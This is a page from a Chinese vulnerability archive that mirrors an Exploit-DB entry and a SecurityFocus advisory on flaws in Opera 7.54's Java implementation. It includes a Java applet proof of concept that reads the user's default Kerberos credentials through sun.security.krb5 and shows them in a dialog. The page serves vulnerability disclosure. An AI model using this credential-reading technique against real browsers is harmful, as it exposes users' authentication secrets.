Opera Web browser 7.54 java implementation – Multiple Vulnerabilities (4)

Opera Web browser 7.54 java implementation – Multiple Vulnerabilities (4)

漏洞ID 1054758 漏洞类型
发布时间 2004-11-19 更新时间 2004-11-19
图片[1]-Opera Web browser 7.54 java implementation – Multiple Vulnerabilities (4)-安全小百科CVE编号 N/A
图片[2]-Opera Web browser 7.54 java implementation – Multiple Vulnerabilities (4)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24758
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11712/info
  
Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.
  
These issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.
  
These issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.
  
Although only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.

import sun.security.krb5.*;

public class Opera754KerberosAppletPrint extends java.applet.Applet{

   public void start() {

        int j =
javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org | Step1
Opera 754 FontCrash, wanna crash? ");
        System.out.println(j);
        try {
        Credentials c =  Credentials.acquireDefaultCreds();

        System.out.println(c);
        j =
javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org |Got
something for ya"+c);

        }
        catch (Exception e) {
        j = javax.swing.JOptionPane.showConfirmDialog(null,e.toString());

        }
   }

}

相关推荐: Multiple Vendor URL JSP Request Source Code Disclosure Vulnerability

Multiple Vendor URL JSP Request Source Code Disclosure Vulnerability 漏洞ID 1103395 漏洞类型 Input Validation Error 发布时间 2001-03-28 更新时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享